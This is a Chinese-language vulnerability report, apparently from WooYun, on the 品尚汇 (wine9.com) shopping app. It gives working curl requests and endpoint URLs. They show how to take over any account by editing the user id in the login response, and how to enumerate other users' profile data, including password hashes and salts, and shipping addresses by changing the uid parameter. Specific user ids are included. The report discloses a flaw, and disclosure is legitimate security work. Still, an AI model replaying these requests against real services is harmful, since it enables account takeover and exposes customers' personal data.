品尚汇某处漏洞导致越权操作任意用户帐号，遍历全部用户收货地址

问题出在APP上

注册登录看一下接口

curl -H "Content-Type: application/x-www-form-urlencoded" --data-binary "password=123456&username=weixinV9ZVWJNR5U" http://psapp.wine9.com/index.php/User/login/ce16f73b5c31c37760f811d6c6f80b39

看返回

HTTP/1.1 200 OK

Date: Tue, 05 Apr 2016 11:25:37 GMT

Server: Apache

Vary: Accept-Encoding

Content-Encoding: gzip

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

Content-Length: 89

{

"code": "0",

"message": "ok",

"result": {

"Code": "0",

"Message": "1550325"

}

}

没有token session之类的东西，只有一个用户id

这个id还是连续的

从社区入手，找几个版主之类的

就找个这个兔子了

从这个接口中得到

http://psapp.wine9.com/index.php/BBS/GetReplyList/ce16f73b5c31c37760f811d6c6f80b39?id=2874&index=1&pagesize=10

userid

再登录时，改包

{

"code": "0",

"message": "ok",

"result": {

"Code": "0",

"Message": "647836"

}

}

接下来，就如同登录上了一样的，看订单，下单什么都可以，用积分去交换都行。

再试几个主要的接口，发现其实是可以遍历的。这几个关键的接口都没有签名

比如查看用户信息：

curl http://psapp.wine9.com/index.php/User/getUserInfo/ce16f73b5c31c37760f811d6c6f80b39?session_id=0c64a3fad5aef75202bb2a7175035634&sign=bea76696f05aeff6d42c8aa951010b09&uid=647836

这个uid随便改

password是什么呀salt这些都返回啦。。。

不知道是哪种编码，，关键信息加*了。看不到

再看一下接口，查找收货地址的

curl http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2262620

居然这个uid也可以随便改的

我试了几个有地址的

http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=1550325

http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2227655

再换几个

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)